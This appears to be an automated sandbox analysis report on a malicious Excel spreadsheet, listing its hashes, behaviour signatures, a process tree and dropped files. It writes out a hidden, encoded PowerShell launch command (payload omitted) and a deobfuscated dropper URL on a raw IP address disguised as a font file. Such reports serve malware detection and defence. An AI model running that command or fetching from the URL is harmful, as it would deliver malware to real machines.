Analysis

  • max time kernel
    47s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-11-2024 21:50

General

  • Target

    cfec6baca826341f3101312b42f296509e2bcba6a32597fcf6589a3a076124b9.xls

  • Size

    46KB

  • MD5

    62c462f23b7c02a5feff2574b3a5da02

  • SHA1

    e4de389e9fc5a5ed7d99f9fc31d98496d7ea7a93

  • SHA256

    cfec6baca826341f3101312b42f296509e2bcba6a32597fcf6589a3a076124b9

  • SHA512

    60f9a662839f1a82db4b5b648fc430b15ad50399221ad06dc816a663ae5aed7df68ed117687cb5e53fd14fbe85ba001c315228d2d3ab9a3c32daa3a9b294763c

  • SSDEEP

    768:a4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:5SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cfec6baca826341f3101312b42f296509e2bcba6a32597fcf6589a3a076124b9.xls"
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc [base64-encoded command omitted]
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3192
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.cmdline"
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AAE.tmp" "c:\Users\Admin\AppData\Local\Temp\3arafkkd\CSCE318E16B44C941C6BDCAA884FD7C7C.TMP"
          PID:2512

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.dll

      Filesize

      3KB

      MD5

      f4c4d7ba39659c262fb1d7f8f3487dba

      SHA1

      1cf2e3e5056ba8bc958fa6bff72de49c36b1ae81

      SHA256

      80aeb6897720306b50a420ace33a5911dcb7c84754417a6ec3c49e17fe6cca31

      SHA512

      d0879e9900620f23089d4f1c4c3adf59902ca727dfe76b3786fd3de65151bbbbf2e425f07859625c8d1ccffccbe3ee0ac74921a877617426c2d4a47b75f6984f

    • C:\Users\Admin\AppData\Local\Temp\RES7AAE.tmp

      Filesize

      1KB

      MD5

      cebf3f6af5cefa5505d17f5c409b753e

      SHA1

      6e8253526587a3d4c87de942ef290db057cd9641

      SHA256

      91a1a297670bf6822a648eb7e82b6d68f31523be709170bac33bacd5260c9e1f

      SHA512

      3b36f632ab74b35975a416e78574763b6a333f9bef21345463bd83eab63e1da152d262a0546b0e1c19727056d4756a7f9565f90ce6ad1e69a10ab2704c6f52c2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2brk1vhz.4qo.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      2KB

      MD5

      43ec985c40043c7a8626afadadb681dc

      SHA1

      92ad1b0578bdeb2e1664da8f26265c66507e9ba6

      SHA256

      092799540413c0a7bae84ecb75485815dbf891bc153c9c5d936b258fafa58c9f

      SHA512

      a558ebd0ad663417fc872e0a96e69283746bad892cd1bb638fefe9938a82b6f1c52547205b212fe7a51c386b9886a2b59ae9ada0ecddd881ce6bdc701a41adb8

    • \??\c:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\3arafkkd\3arafkkd.cmdline

      Filesize

      369B

      MD5

      e31d3263e90e129e3c2d4759bd062555

      SHA1

      ed221b20412008b938a38aa75356cf6d4711633a

      SHA256

      cb90920e1f3099e168b371e1423e53ca66dfa7db310d22fee08dc352ef9962a2

      SHA512

      6ef5797b346dcf08616bbcf3bc2a93134f36b323a4fcbf0a67ffdaea27a950275d28027e888a28bbdc6b43ca5cb6c01d3f47508fc85f70546f1b8eed1308d85a

    • \??\c:\Users\Admin\AppData\Local\Temp\3arafkkd\CSCE318E16B44C941C6BDCAA884FD7C7C.TMP

      Filesize

      652B

      MD5

      2792148cce6edfbe825b5d7022048d3e

      SHA1

      fd19e75e876432793b9959aefca91c76917ac9cb

      SHA256

      129e08af9899fcad7e21cd3feea385559d93cb81295ae3cbef5ded935af81984

      SHA512

      e65c32d78b3797014076805680fc14423abb490aa70046d78f182409d87a9d60c229c341c3c8db28f62e738712ed61fa83a5034bb6e83c269f5e32d92354083c

    • memory/3048-12-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

      Filesize

      64KB

    • memory/3048-31-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-13-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-15-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-14-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-11-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-16-0x00007FF7D7BF0000-0x00007FF7D7C00000-memory.dmp

      Filesize

      64KB

    • memory/3048-18-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-19-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-17-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-9-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-8-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-6-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-0-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-32-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-1-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-10-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-7-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-2-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-3-0x00007FF819E6D000-0x00007FF819E6E000-memory.dmp

      Filesize

      4KB

    • memory/3048-4-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-5-0x00007FF7D9E50000-0x00007FF7D9E60000-memory.dmp

      Filesize

      64KB

    • memory/3048-65-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3048-61-0x00007FF819DD0000-0x00007FF819FC5000-memory.dmp

      Filesize

      2.0MB

    • memory/3192-57-0x000002A7CE5F0000-0x000002A7CE5F8000-memory.dmp

      Filesize

      32KB

    • memory/3192-35-0x000002A7CE600000-0x000002A7CE622000-memory.dmp

      Filesize

      136KB